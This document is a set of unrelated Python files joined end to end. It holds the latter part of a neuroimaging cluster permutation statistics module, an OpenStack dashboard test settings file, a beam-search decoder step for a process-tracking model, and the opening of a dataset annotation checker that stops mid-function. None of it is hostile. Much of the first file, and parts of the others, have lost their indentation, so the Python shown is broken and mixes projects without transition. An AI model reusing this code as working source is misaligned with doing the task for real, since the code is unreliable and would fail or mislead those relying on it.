p < 0.05 for the given number of (within-subject) observations.
If a dict is used, then threshold-free cluster enhancement (TFCE)
will be used.
n_permutations : int
The number of permutations to compute.
tail : -1 or 0 or 1 (default = 0)
If tail is 1, the statistic is thresholded above threshold.
If tail is -1, the statistic is thresholded below threshold.
If tail is 0, the statistic is thresholded on both sides of
the distribution.
stat_fun : function
Function used to compute the statistical map.
connectivity : sparse matrix or None
Defines connectivity between features. The matrix is assumed to
be symmetric and only the upper triangular half is used.
This matrix must be square with dimension (n_vertices * n_times) or
(n_vertices). Default is None, i.e, a regular lattice connectivity.
Use square n_vertices matrix for datasets with a large temporal
extent to save on memory and computation time.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
n_jobs : int
Number of permutations to run in parallel (requires joblib package).
seed : int or None
Seed the random number generator for results reproducibility.
Note that if n_permutations >= 2^(n_samples) [or (2^(n_samples-1)) for
two-tailed tests], this value will be ignored since an exact test
(full permutation test) will be performed.
max_step : int
When connectivity is a n_vertices x n_vertices matrix, specify the
maximum number of steps between vertices along the second dimension
(typically time) to be considered connected. This is not used for full
or None connectivity matrices.
exclude : boolean array or None
Mask to apply to the data to exclude certain points from clustering
(e.g., medial wall vertices). Should be the same shape as X. If None,
no points are excluded.
step_down_p : float
To perform a step-down-in-jumps test, pass a p-value for clusters to
exclude from each successive iteration. Default is zero, perform no
step-down test (since no clusters will be smaller than this value).
Setting this to a reasonable value, e.g. 0.05, can increase sensitivity
but costs computation time.
t_power : float
Power to raise the statistical values (usually t-values) by before
summing (sign will be retained). Note that t_power == 0 will give a
count of nodes in each cluster, t_power == 1 will weight each node by
its statistical score.
out_type : str
For arrays with connectivity, this sets the output format for clusters.
If 'mask', it will pass back a list of boolean mask arrays.
If 'indices', it will pass back a list of lists, where each list is the
set of vertices in a given cluster. Note that the latter may use far
less memory for large datasets.
    check_disjoint : bool
        If True, the connectivity matrix (or list) will be examined to
        determine if it can be separated into disjoint sets. In some cases
        (usually with connectivity as a list and many "time" points), this
        can lead to faster clustering, but results should be identical.
    buffer_size : int or None
        The statistics will be computed for blocks of variables of size
        "buffer_size" at a time. This option significantly reduces the
        memory requirements when n_jobs > 1 and memory sharing between
        processes is enabled (see set_cache_dir()), as X will be shared
        between processes and each process only needs to allocate space
        for a small block of variables.
Returns
-------
T_obs : array of shape [n_tests]
T-statistic observed for all variables
clusters : list
List type defined by out_type above.
cluster_pv : array
P-value for each cluster
H0 : array of shape [n_permutations]
Max cluster level stats observed under permutation.
Notes
-----
Reference:
Cluster permutation algorithm as described in
Maris/Oostenveld (2007),
"Nonparametric statistical testing of EEG- and MEG-data"
Journal of Neuroscience Methods, Vol. 164, No. 1., pp. 177-190.
doi:10.1016/j.jneumeth.2007.03.024
"""
if threshold is None:
p_thresh = 0.05 / (1 + (tail == 0))
n_samples = len(X)
threshold = -stats.distributions.t.ppf(p_thresh, n_samples - 1)
if np.sign(tail) < 0:
threshold = -threshold
X = [X] # for one sample only one data array
return _permutation_cluster_test(X=X,
threshold=threshold,
n_permutations=n_permutations,
tail=tail, stat_fun=stat_fun,
connectivity=connectivity,
verbose=verbose,
n_jobs=n_jobs, seed=seed,
max_step=max_step,
exclude=exclude, step_down_p=step_down_p,
t_power=t_power, out_type=out_type,
check_disjoint=check_disjoint,
buffer_size=buffer_size)
permutation_cluster_1samp_test.__test__ = False
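# Illustrative usage sketch (hypothetical data): testing whether 15 observations
# of a time series deviate from zero, using random sign-flip permutations.
def _example_permutation_cluster_1samp_test():
    rng = np.random.RandomState(7)
    X = rng.randn(15, 60)
    X[:, 10:20] += 0.8  # mean shifted away from zero in samples 10-20
    T_obs, clusters, cluster_pv, H0 = permutation_cluster_1samp_test(
        X, n_permutations=500, tail=0)
    return clusters, cluster_pv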
@verbose
def spatio_temporal_cluster_1samp_test(X, threshold=None,
n_permutations=1024, tail=0,
stat_fun=ttest_1samp_no_p,
connectivity=None, verbose=None,
n_jobs=1, seed=None, max_step=1,
spatial_exclude=None, step_down_p=0,
t_power=1, out_type='indices',
check_disjoint=False, buffer_size=1000):
"""Non-parametric cluster-level 1 sample T-test for spatio-temporal data
This function provides a convenient wrapper for data organized in the form
(observations x time x space) to use permutation_cluster_1samp_test.
Parameters
----------
X : array
Array of shape observations x time x vertices.
threshold : float | dict | None
If threshold is None, it will choose a t-threshold equivalent to
p < 0.05 for the given number of (within-subject) observations.
If a dict is used, then threshold-free cluster enhancement (TFCE)
will be used.
n_permutations : int
The number of permutations to compute.
tail : -1 or 0 or 1 (default = 0)
If tail is 1, the statistic is thresholded above threshold.
If tail is -1, the statistic is thresholded below threshold.
If tail is 0, the statistic is thresholded on both sides of
the distribution.
stat_fun : function
Function used to compute the statistical map.
connectivity : sparse matrix or None
Defines connectivity between features. The matrix is assumed to
be symmetric and only the upper triangular half is used.
This matrix must be square with dimension (n_vertices * n_times) or
(n_vertices). Default is None, i.e, a regular lattice connectivity.
Use square n_vertices matrix for datasets with a large temporal
extent to save on memory and computation time.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
n_jobs : int
Number of permutations to run in parallel (requires joblib package).
seed : int or None
Seed the random number generator for results reproducibility.
Note that if n_permutations >= 2^(n_samples) [or (2^(n_samples-1)) for
two-tailed tests], this value will be ignored since an exact test
(full permutation test) will be performed.
max_step : int
When connectivity is a n_vertices x n_vertices matrix, specify the
maximum number of steps between vertices along the second dimension
(typically time) to be considered connected. This is not used for full
or None connectivity matrices.
spatial_exclude : list of int or None
List of spatial indices to exclude from clustering.
step_down_p : float
To perform a step-down-in-jumps test, pass a p-value for clusters to
exclude from each successive iteration. Default is zero, perform no
step-down test (since no clusters will be smaller than this value).
Setting this to a reasonable value, e.g. 0.05, can increase sensitivity
but costs computation time.
t_power : float
Power to raise the statistical values (usually t-values) by before
summing (sign will be retained). Note that t_power == 0 will give a
count of nodes in each cluster, t_power == 1 will weight each node by
its statistical score.
out_type : str
For arrays with connectivity, this sets the output format for clusters.
If 'mask', it will pass back a list of boolean mask arrays.
If 'indices', it will pass back a list of lists, where each list is the
set of vertices in a given cluster. Note that the latter may use far
less memory for large datasets.
    check_disjoint : bool
        If True, the connectivity matrix (or list) will be examined to
        determine if it can be separated into disjoint sets. In some cases
        (usually with connectivity as a list and many "time" points), this
        can lead to faster clustering, but results should be identical.
    buffer_size : int or None
        The statistics will be computed for blocks of variables of size
        "buffer_size" at a time. This option significantly reduces the
        memory requirements when n_jobs > 1 and memory sharing between
        processes is enabled (see set_cache_dir()), as X will be shared
        between processes and each process only needs to allocate space
        for a small block of variables.
Returns
-------
T_obs : array of shape [n_tests]
T-statistic observed for all variables.
clusters : list
List type defined by out_type above.
cluster_pv: array
P-value for each cluster
H0 : array of shape [n_permutations]
Max cluster level stats observed under permutation.
Notes
-----
Reference:
Cluster permutation algorithm as described in
Maris/Oostenveld (2007),
"Nonparametric statistical testing of EEG- and MEG-data"
Journal of Neuroscience Methods, Vol. 164, No. 1., pp. 177-190.
doi:10.1016/j.jneumeth.2007.03.024
TFCE originally described in Smith/Nichols (2009),
"Threshold-free cluster enhancement: Addressing problems of
smoothing, threshold dependence, and localisation in cluster
inference", NeuroImage 44 (2009) 83-98.
"""
n_samples, n_times, n_vertices = X.shape
# convert spatial_exclude before passing on if necessary
if spatial_exclude is not None:
exclude = _st_mask_from_s_inds(n_times, n_vertices,
spatial_exclude, True)
else:
exclude = None
# do the heavy lifting
out = permutation_cluster_1samp_test(X, threshold=threshold,
stat_fun=stat_fun, tail=tail,
n_permutations=n_permutations,
connectivity=connectivity,
n_jobs=n_jobs, seed=seed,
max_step=max_step, exclude=exclude,
step_down_p=step_down_p,
t_power=t_power, out_type=out_type,
check_disjoint=check_disjoint,
buffer_size=buffer_size)
return out
spatio_temporal_cluster_1samp_test.__test__ = False
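# Illustrative usage sketch (hypothetical data): observations x time x space
# input with a sparse spatial connectivity (a chain of 4 vertices).
def _example_spatio_temporal_cluster_1samp_test():
    from scipy import sparse
    rng = np.random.RandomState(0)
    X = rng.randn(12, 10, 4)  # 12 subjects, 10 time points, 4 vertices
    connectivity = sparse.coo_matrix(
        (np.ones(3), ([0, 1, 2], [1, 2, 3])), shape=(4, 4))
    T_obs, clusters, cluster_pv, H0 = spatio_temporal_cluster_1samp_test(
        X, connectivity=connectivity, n_permutations=100)
    return clusters, cluster_pv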
@verbose
def spatio_temporal_cluster_test(X, threshold=1.67, n_permutations=1024,
tail=0, stat_fun=f_oneway,
connectivity=None, verbose=None, n_jobs=1,
seed=None, max_step=1, spatial_exclude=None,
step_down_p=0, t_power=1, out_type='indices',
check_disjoint=False, buffer_size=1000):
"""Non-parametric cluster-level test for spatio-temporal data
This function provides a convenient wrapper for data organized in the form
(observations x time x space) to use permutation_cluster_test.
Parameters
----------
X: list of arrays
Array of shape (observations, time, vertices) in each group.
threshold: float
The threshold for the statistic.
n_permutations: int
See permutation_cluster_test.
tail : -1 or 0 or 1 (default = 0)
See permutation_cluster_test.
stat_fun : function
function called to calculate statistics, must accept 1d-arrays as
arguments (default: scipy.stats.f_oneway)
connectivity : sparse matrix or None
Defines connectivity between features. The matrix is assumed to
be symmetric and only the upper triangular half is used.
Default is None, i.e, a regular lattice connectivity.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
n_jobs : int
Number of permutations to run in parallel (requires joblib package).
seed : int or None
Seed the random number generator for results reproducibility.
max_step : int
When connectivity is a n_vertices x n_vertices matrix, specify the
maximum number of steps between vertices along the second dimension
(typically time) to be considered connected. This is not used for full
or None connectivity matrices.
spatial_exclude : list of int or None
List of spatial indices to exclude from clustering.
step_down_p : float
To perform a step-down-in-jumps test, pass a p-value for clusters to
exclude from each successive iteration. Default is zero, perform no
step-down test (since no clusters will be smaller than this value).
Setting this to a reasonable value, e.g. 0.05, can increase sensitivity
but costs computation time.
t_power : float
Power to raise the statistical values (usually f-values) by before
summing (sign will be retained). Note that t_power == 0 will give a
count of nodes in each cluster, t_power == 1 will weight each node by
its statistical score.
out_type : str
For arrays with connectivity, this sets the output format for clusters.
If 'mask', it will pass back a list of boolean mask arrays.
If 'indices', it will pass back a list of lists, where each list is the
set of vertices in a given cluster. Note that the latter may use far
less memory for large datasets.
    check_disjoint : bool
        If True, the connectivity matrix (or list) will be examined to
        determine if it can be separated into disjoint sets. In some cases
        (usually with connectivity as a list and many "time" points), this
        can lead to faster clustering, but results should be identical.
    buffer_size : int or None
        The statistics will be computed for blocks of variables of size
        "buffer_size" at a time. This option significantly reduces the
        memory requirements when n_jobs > 1 and memory sharing between
        processes is enabled (see set_cache_dir()), as X will be shared
        between processes and each process only needs to allocate space
        for a small block of variables.
Returns
-------
T_obs : array of shape [n_tests]
T-statistic observed for all variables
clusters : list
List type defined by out_type above.
cluster_pv: array
P-value for each cluster
H0 : array of shape [n_permutations]
Max cluster level stats observed under permutation.
Notes
-----
Reference:
Cluster permutation algorithm as described in
Maris/Oostenveld (2007),
"Nonparametric statistical testing of EEG- and MEG-data"
Journal of Neuroscience Methods, Vol. 164, No. 1., pp. 177-190.
doi:10.1016/j.jneumeth.2007.03.024
"""
n_samples, n_times, n_vertices = X[0].shape
# convert spatial_exclude before passing on if necessary
if spatial_exclude is not None:
exclude = _st_mask_from_s_inds(n_times, n_vertices,
spatial_exclude, True)
else:
exclude = None
# do the heavy lifting
out = permutation_cluster_test(X, threshold=threshold,
stat_fun=stat_fun, tail=tail,
n_permutations=n_permutations,
connectivity=connectivity, n_jobs=n_jobs,
seed=seed, max_step=max_step,
exclude=exclude, step_down_p=step_down_p,
t_power=t_power, out_type=out_type,
check_disjoint=check_disjoint,
buffer_size=buffer_size)
return out
spatio_temporal_cluster_test.__test__ = False
def _st_mask_from_s_inds(n_times, n_vertices, vertices, set_as=True):
"""This function returns a boolean mask vector to apply to a spatio-
temporal connectivity matrix (n_times * n_vertices square) to include (or
exclude) certain spatial coordinates. This is useful for excluding certain
regions from analysis (e.g., medial wall vertices).
Parameters
----------
n_times : int
Number of time points.
n_vertices : int
Number of spatial points.
vertices : list or array of int
Vertex numbers to set.
set_as : bool
If True, all points except "vertices" are set to False (inclusion).
If False, all points except "vertices" are set to True (exclusion).
Returns
-------
mask : array of bool
A (n_times * n_vertices) array of boolean values for masking
"""
mask = np.zeros((n_times, n_vertices), dtype=bool)
mask[:, vertices] = True
mask = mask.ravel()
if set_as is False:
mask = np.logical_not(mask)
return mask
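# Illustrative sketch (hypothetical values): keep only vertex 1 of 3 across 2
# time points; the returned mask is the raveled (n_times, n_vertices) array.
def _example_st_mask_from_s_inds():
    mask = _st_mask_from_s_inds(n_times=2, n_vertices=3, vertices=[1])
    # mask == [False, True, False, False, True, False]
    return mask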
@verbose
def _get_partitions_from_connectivity(connectivity, n_times, verbose=None):
"""Use indices to specify disjoint subsets (e.g., hemispheres) based on
connectivity"""
if isinstance(connectivity, list):
test = np.ones(len(connectivity))
test_conn = np.zeros((len(connectivity), len(connectivity)),
dtype='bool')
for vi in range(len(connectivity)):
test_conn[connectivity[vi], vi] = True
test_conn = sparse.coo_matrix(test_conn, dtype='float')
else:
test = np.ones(connectivity.shape[0])
test_conn = connectivity
part_clusts = _find_clusters(test, 0, 1, test_conn)[0]
if len(part_clusts) > 1:
logger.info('%i disjoint connectivity sets found'
% len(part_clusts))
partitions = np.zeros(len(test), dtype='int')
for ii, pc in enumerate(part_clusts):
partitions[pc] = ii
if isinstance(connectivity, list):
partitions = np.tile(partitions, n_times)
else:
logger.info('No disjoint connectivity sets found')
partitions = None
return partitions
def _reshape_clusters(clusters, sample_shape):
"""Reshape cluster masks or indices to be of the correct shape"""
# format of the bool mask and indices are ndarrays
if len(clusters) > 0 and isinstance(clusters[0], np.ndarray):
if clusters[0].dtype == bool: # format of mask
clusters = [c.reshape(sample_shape) for c in clusters]
else: # format of indices
clusters = [unravel_index(c, sample_shape) for c in clusters]
return clusters
def summarize_clusters_stc(clu, p_thresh=0.05, tstep=1e-3, tmin=0,
subject='fsaverage', vertices=None, vertno=None):
""" Assemble summary SourceEstimate from spatiotemporal cluster results
    This helps with visualizing results from spatio-temporal clustering
    permutation tests
Parameters
----------
clu : tuple
the output from clustering permutation tests.
p_thresh : float
The significance threshold for inclusion of clusters.
tstep : float
The temporal difference between two time samples.
tmin : float | int
The time of the first sample.
subject : str
The name of the subject.
    vertices : list of arrays | None
        The vertex numbers associated with the source space locations. Defaults
        to None. If None, equals ```[np.arange(10242), np.arange(10242)]```.
    vertno : list of arrays | None
        Deprecated (will be removed in 0.11). Use vertices instead.
Returns
-------
out : instance of SourceEstimate
"""
if vertno is not None:
warnings.warn("The vertno parameter is deprecated and will be removed "
"in version 0.11. Use vertices instead.",
DeprecationWarning)
vertices = vertno
if vertices is None:
vertices = [np.arange(10242), np.arange(10242)]
T_obs, clusters, clu_pvals, _ = clu
n_times, n_vertices = T_obs.shape
good_cluster_inds = np.where(clu_pvals < p_thresh)[0]
# Build a convenient representation of each cluster, where each
# cluster becomes a "time point" in the SourceEstimate
if len(good_cluster_inds) > 0:
data = np.zeros((n_vertices, n_times))
data_summary = np.zeros((n_vertices, len(good_cluster_inds) + 1))
for ii, cluster_ind in enumerate(good_cluster_inds):
data.fill(0)
v_inds = clusters[cluster_ind][1]
t_inds = clusters[cluster_ind][0]
data[v_inds, t_inds] = T_obs[t_inds, v_inds]
# Store a nice visualization of the cluster by summing across time
data = np.sign(data) * np.logical_not(data == 0) * tstep
data_summary[:, ii + 1] = 1e3 * np.sum(data, axis=1)
# Make the first "time point" a sum across all clusters for easy
# visualization
data_summary[:, 0] = np.sum(data_summary, axis=1)
return SourceEstimate(data_summary, vertices, tmin=tmin, tstep=tstep,
subject=subject)
else:
raise RuntimeError('No significant clusters available. Please adjust '
'your threshold or check your statistical '
'analysis.')
|
the-stack_0_19833 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from django.utils.translation import pgettext_lazy
from horizon.test.settings import * # noqa
from horizon.utils import secret_key
from openstack_dashboard import exceptions
from horizon.utils.escape import monkeypatch_escape
# this is used to protect from client XSS attacks, but it's worth
# enabling in our test setup to find any issues it might cause
monkeypatch_escape()
from openstack_dashboard.utils import settings as settings_utils
TEST_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_PATH = os.path.abspath(os.path.join(TEST_DIR, ".."))
MEDIA_ROOT = os.path.abspath(os.path.join(ROOT_PATH, '..', 'media'))
MEDIA_URL = '/media/'
STATIC_ROOT = os.path.abspath(os.path.join(ROOT_PATH, '..', 'static'))
STATIC_URL = '/static/'
WEBROOT = '/'
SECRET_KEY = secret_key.generate_or_read_from_file(
os.path.join(TEST_DIR, '.secret_key_store'))
ROOT_URLCONF = 'openstack_dashboard.test.urls'
TEMPLATES[0]['DIRS'] = [
os.path.join(TEST_DIR, 'templates')
]
TEMPLATES[0]['OPTIONS']['context_processors'].append(
'openstack_dashboard.context_processors.openstack'
)
CUSTOM_THEME_PATH = 'themes/default'
# 'key', 'label', 'path'
AVAILABLE_THEMES = [
(
'default',
pgettext_lazy('Default style theme', 'Default'),
'themes/default'
), (
'material',
pgettext_lazy("Google's Material Design style theme", "Material"),
'themes/material'
),
]
# Theme Static Directory
THEME_COLLECTION_DIR = 'themes'
COMPRESS_OFFLINE = False
INSTALLED_APPS = (
'django.contrib.contenttypes',
'django.contrib.auth',
'django.contrib.sessions',
'django.contrib.staticfiles',
'django.contrib.messages',
'django.contrib.humanize',
'django_nose',
'openstack_auth',
'compressor',
'horizon',
'openstack_dashboard',
)
AUTHENTICATION_BACKENDS = ('openstack_auth.backend.KeystoneBackend',)
SITE_BRANDING = 'OpenStack'
HORIZON_CONFIG = {
"password_validator": {
"regex": '^.{8,18}$',
"help_text": "Password must be between 8 and 18 characters."
},
'user_home': None,
'help_url': "http://docs.openstack.org",
'exceptions': {'recoverable': exceptions.RECOVERABLE,
'not_found': exceptions.NOT_FOUND,
'unauthorized': exceptions.UNAUTHORIZED},
'angular_modules': [],
'js_files': [],
}
ANGULAR_FEATURES = {
'images_panel': False # Use the legacy panel so unit tests are still run
}
STATICFILES_DIRS = settings_utils.get_xstatic_dirs(
settings_utils.BASE_XSTATIC_MODULES, HORIZON_CONFIG
)
# Load the pluggable dashboard settings
import openstack_dashboard.enabled
INSTALLED_APPS = list(INSTALLED_APPS) # Make sure it's mutable
settings_utils.update_dashboards(
[
openstack_dashboard.enabled,
],
HORIZON_CONFIG,
INSTALLED_APPS,
)
# Remove this when the legacy panel is removed, along with its tests and
# the stacks MappingsTests are updated with the new URL path.
HORIZON_CONFIG['swift_panel'] = 'legacy'
settings_utils.find_static_files(HORIZON_CONFIG, AVAILABLE_THEMES,
THEME_COLLECTION_DIR, ROOT_PATH)
# Set to 'legacy' or 'direct' to allow users to upload images to glance via
# Horizon server. When enabled, a file form field will appear on the create
# image form. If set to 'off', there will be no file form field on the create
# image form. See documentation for deployment considerations.
HORIZON_IMAGES_UPLOAD_MODE = 'legacy'
AVAILABLE_REGIONS = [
('http://localhost:5000/v2.0', 'local'),
('http://remote:5000/v2.0', 'remote'),
]
OPENSTACK_API_VERSIONS = {
"identity": 3,
"image": 2
}
OPENSTACK_KEYSTONE_URL = "http://localhost:5000/v2.0"
OPENSTACK_KEYSTONE_DEFAULT_ROLE = "_member_"
OPENSTACK_KEYSTONE_MULTIDOMAIN_SUPPORT = True
OPENSTACK_KEYSTONE_DEFAULT_DOMAIN = 'test_domain'
OPENSTACK_KEYSTONE_FEDERATION_MANAGEMENT = True
OPENSTACK_KEYSTONE_BACKEND = {
'name': 'native',
'can_edit_user': True,
'can_edit_group': True,
'can_edit_project': True,
'can_edit_domain': True,
'can_edit_role': True
}
OPENSTACK_CINDER_FEATURES = {
'enable_backup': True,
}
OPENSTACK_NEUTRON_NETWORK = {
'enable_router': True,
'enable_quotas': False, # Enabled in specific tests only
# Parameters below (enable_lb, enable_firewall, enable_vpn)
# control if these panels are displayed or not,
# i.e. they only affect the navigation menu.
# These panels are registered even if enable_XXX is False,
# so we don't need to set them to True in most unit tests
# to avoid stubbing neutron extension check calls.
'enable_lb': False,
'enable_firewall': False,
'enable_vpn': False,
'profile_support': None,
'enable_distributed_router': False,
# 'profile_support': 'cisco'
}
OPENSTACK_HYPERVISOR_FEATURES = {
'can_set_mount_point': False,
'can_set_password': True,
}
OPENSTACK_IMAGE_BACKEND = {
'image_formats': [
('', 'Select format'),
('aki', 'AKI - Amazon Kernel Image'),
('ami', 'AMI - Amazon Machine Image'),
('ari', 'ARI - Amazon Ramdisk Image'),
('iso', 'ISO - Optical Disk Image'),
('qcow2', 'QCOW2 - QEMU Emulator'),
('raw', 'Raw'),
('vdi', 'VDI'),
('vhd', 'VHD'),
('vmdk', 'VMDK')
]
}
LOGGING['loggers'].update(
{
'openstack_dashboard': {
'handlers': ['test'],
'propagate': False,
},
'openstack_auth': {
'handlers': ['test'],
'propagate': False,
},
'novaclient': {
'handlers': ['test'],
'propagate': False,
},
'keystoneclient': {
'handlers': ['test'],
'propagate': False,
},
'glanceclient': {
'handlers': ['test'],
'propagate': False,
},
'neutronclient': {
'handlers': ['test'],
'propagate': False,
},
'iso8601': {
'handlers': ['null'],
'propagate': False,
},
}
)
SECURITY_GROUP_RULES = {
'all_tcp': {
'name': 'ALL TCP',
'ip_protocol': 'tcp',
'from_port': '1',
'to_port': '65535',
},
'http': {
'name': 'HTTP',
'ip_protocol': 'tcp',
'from_port': '80',
'to_port': '80',
},
}
NOSE_ARGS = ['--nocapture',
'--nologcapture',
'--cover-package=openstack_dashboard',
'--cover-inclusive',
'--all-modules']
POLICY_FILES_PATH = os.path.join(ROOT_PATH, "conf")
POLICY_FILES = {
'identity': 'keystone_policy.json',
'compute': 'nova_policy.json'
}
# The openstack_auth.user.Token object isn't JSON-serializable ATM
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer'
REST_API_SETTING_1 = 'foo'
REST_API_SETTING_2 = 'bar'
REST_API_SECURITY = 'SECURITY'
REST_API_REQUIRED_SETTINGS = ['REST_API_SETTING_1']
REST_API_ADDITIONAL_SETTINGS = ['REST_API_SETTING_2']
ALLOWED_PRIVATE_SUBNET_CIDR = {'ipv4': [], 'ipv6': []}
|
the-stack_0_19835 | import heapq
import logging
import torch
from allennlp.nn.decoding import DecoderStep
from propara.trainer_decoder.propara_decoder_state import ProParaDecoderState
from collections import defaultdict
from typing import List, Set, Dict
from overrides import overrides
from propara.trainer_decoder.action_scorer import ActionScorer
from propara.trainer_decoder.valid_action_generator import ValidActionGenerator, DummyConstrainedStepper, \
CommonsenseBasedActionGenerator
logger = logging.getLogger(__name__)
class ProParaDecoderStep(DecoderStep[ProParaDecoderState]):
def __init__(self,
action_scorer: ActionScorer,
valid_action_generator: ValidActionGenerator,
):
super(ProParaDecoderStep, self).__init__()
self._action_scorer = action_scorer
self._valid_action_generator = valid_action_generator
self._num_failures = 0
def change_action_scorer(self, new_action_scorer):
self._action_scorer = new_action_scorer
def get_action_scorer(self):
return self._action_scorer
def change_valid_action_generator(self, new_valid_action_generator):
self._valid_action_generator = new_valid_action_generator
def get_valid_action_generator(self):
return self._valid_action_generator
def set_num_participants(self, num_participants):
if isinstance(self._valid_action_generator, DummyConstrainedStepper) or \
isinstance(self._valid_action_generator, CommonsenseBasedActionGenerator):
self._valid_action_generator.set_num_participants(num_participants)
def set_num_steps(self, num_steps):
if isinstance(self._valid_action_generator, CommonsenseBasedActionGenerator):
self._valid_action_generator.set_num_steps(num_steps)
@overrides
def take_step(self,
state: ProParaDecoderState,
max_actions: int = None,
allowed_actions: List[Set] = None) -> List[ProParaDecoderState]:
"""
Parameters:
state: ``ProParaDecoderState``
The state (or group of states) from which to choose a next step.
max_actions: int
The beam size
allowed_actions: ``List[Set]``, optional (default = None)
            Valid actions are dynamic per state, while allowed actions are
            defined up front (e.g., a list of labels such as CREATE or
            DESTROY) for the entire batch.
The base class (DecoderStep) enforces the shape `batch x allowed_actions_for_any_participant`.
This is limiting because we need to specify allowed actions per participant
So we actually need: List[Set[Ubertuple]] instead of List[Set[int]].
Returns:
``List[ProParaDecoderState]``
the next states
"""
# Batch_index -> possible next states with their score.
# 'ProParaDecoderState' object does not support indexing,
# so we convert to a dictionary before sorting by score.
indexed_next_states: Dict[int, List[ProParaDecoderState]] = defaultdict(list)
if not allowed_actions:
allowed_actions = [None] * len(state.batch_indices)
# Generate a new state based on valid actions.
# state.start_values can be None, so do not loop over it.
for batch_index, action_hist, score, allowed_action in zip(state.batch_indices,
state.action_history,
state.score,
allowed_actions):
# Create many new ProParaDecoder states based on valid actions from the curr state.
# Do not group the new states into one ProParaDecoderState.
new_states = self.possible_states_from(batch_index,
state,
score,
# logits corresponding to the next step.
state.logit_tensor[batch_index][len(action_hist)],
action_hist,
allowed_action,
max_actions
)
# Prepare for sorting by grouping returned states by their batch index.
for new_state in new_states:
indexed_next_states[batch_index].append(new_state)
# Now, sort the states by score.
next_states: List[ProParaDecoderState] = ProParaDecoderStep. \
sort_states_by_score(indexed_next_states, max_actions)
return next_states
# Generate a list of states based on valid steps that can be taken from the current state.
# To create a state, append history and compute a score for the state (per participant).
def possible_states_from(self,
batch_index,
state,
state_score,
model_score,
action_history,
allowed_action,
max_actions) -> List[ProParaDecoderState]:
new_states: List[ProParaDecoderState] = []
scores_of_valid_actions = []
sum_scores_of_valid_actions = 0.
# In this function, one ProParaDecoderState contains exactly one state.
# valid actions contain one action per participant e.g., (0: None, 1:Create, 0:None).
(valid_actions, valid_actions_debug_info) = self._valid_action_generator.generate(action_history, state.metadata)
if allowed_action and list(allowed_action)[0] not in valid_actions:
self._num_failures += 1
# FIXME wrong score of the valid allowed action
for action in allowed_action:
valid_actions.append(action)
softmax_input = [] # Array of 1D tensors to be stacked for log(softmax)
for valid_action_id, valid_action in enumerate(valid_actions):
# Compute score per participant.
curr_scores_per_parti = (self._action_scorer.score_of(
action_history,
valid_action,
model_score,
state.metadata))
# participant wise score.
# It is unclear if we need to append the history of prev. participant wise scores.
# because we are already maintaining a score per state.
# scores_of_valid_actions.append(curr_scores_per_parti + previous_scores_per_participant)
scores_of_valid_actions.append(curr_scores_per_parti)
softmax_input.append(curr_scores_per_parti.sum()) # 1D Tensor
sum_scores_of_valid_actions += curr_scores_per_parti.sum()
curr_scores = torch.nn.functional.log_softmax(torch.cat(softmax_input), dim=-1)
# allowed valid action (that is part of the gold sequence)
for valid_action_id, valid_action in enumerate(valid_actions):
in_beam_search = state.metadata.get('in_beam_search', False)
valid_action_is_allowed = allowed_action and valid_action in allowed_action
if in_beam_search or valid_action_is_allowed:
# num participants should match.
# logit_tensor: (batch_size, num_sentences, num_participants, num_actions)
# assert len(new_scores) == state.logit_tensor.shape[2]
# lookup per participant score of this chosen valid_action_id.
unnorm_score_per_participant = scores_of_valid_actions[valid_action_id]
curr_score = curr_scores[valid_action_id]
# new state score = prev state score (must be maintained for backprop) + curr score
new_state_score = state_score + curr_score
# Note: We only construct new states for the chosen valid actions.
# For these new states, the group size is 1 (so we construct [batch_index] etc.).
new_state = ProParaDecoderState(
# Shape: [batch]
group_indices=[batch_index],
# Shape: [batch[step[participants_labels]]]
action_history=[action_history + [valid_action]],
# Shape: [batch[participant_label_score]]
participant_score_per_group=[unnorm_score_per_participant],
participants_embedding=state.participants_embedding,
logit_tensor=state.logit_tensor,
instance_id=state.instance_id,
metadata=state.metadata,
overall_score=[new_state_score] # score of the state.
# start_value was only needed for step 1.
)
new_states.append((-new_state_score.data[0], new_state))
new_states.sort(key=lambda pair: pair[0])
new_states = new_states[:max_actions]
return [pair[1] for pair in new_states]
@classmethod
def sort_states_by_score(
cls,
indexed_next_states,
max_actions
) -> List[ProParaDecoderState]:
next_states: List[ProParaDecoderState] = []
# state is of type ProParaDecoderState -- state has group size of 1
# sort these states based on state score (which is a list of autograd variables).
for batch_next_states in indexed_next_states.values():
sorted_next_states = [(-state.score[0].data[0], state) for state in batch_next_states]
sorted_next_states.sort(key=lambda x: x[0])
if max_actions is not None:
sorted_next_states = sorted_next_states[:max_actions]
next_states.extend(state[1] for state in sorted_next_states)
return next_states
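# Illustrative sketch (standalone, hypothetical data): the beam pruning in
# sort_states_by_score keeps, per batch element, the max_actions states with
# the highest scores. The same logic on plain (score, state) tuples:
def _example_sort_states_by_score():
    indexed_next_states = {0: [(0.2, "s1"), (0.9, "s2"), (0.5, "s3")]}
    max_actions = 2
    kept = []
    for batch_states in indexed_next_states.values():
        ranked = sorted(batch_states, key=lambda pair: -pair[0])
        kept.extend(state for _, state in ranked[:max_actions])
    return kept  # ["s2", "s3"]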
|
the-stack_0_19838 | import numpy as np
from sklearn.model_selection import train_test_split
import funcy
from tabulate import tabulate
import coloredlogs, logging
from glob import glob
import itertools, os, json, urllib.request
from tqdm import tqdm
from os.path import join as opj
import cv2
coloredlogs.install()
logging.basicConfig(format='[%(asctime)s : %(message)s %(filename)s]',
                    level=logging.ERROR)
def check_instances_categories(file, annotations, class_names):
"""
#### category index should start from 1
"""
num_classes = len(class_names)
hist_bins = np.arange(num_classes + 1)
histogram = np.zeros((num_classes,))
for anno in annotations:
classes = np.asarray(
[anno["category_id"] - 1]
)
if len(classes):
assert classes.min() >= 0, f"Got an invalid category_id={classes.min()}"
assert (
classes.max() < num_classes
), f"Got an invalid category_id={classes.max()} for a dataset of {num_classes} classes"
histogram += np.histogram(classes, bins=hist_bins)[0]
N_COLS = min(6, len(class_names) * 2)
def short_name(x):
# make long class names shorter. useful for lvis
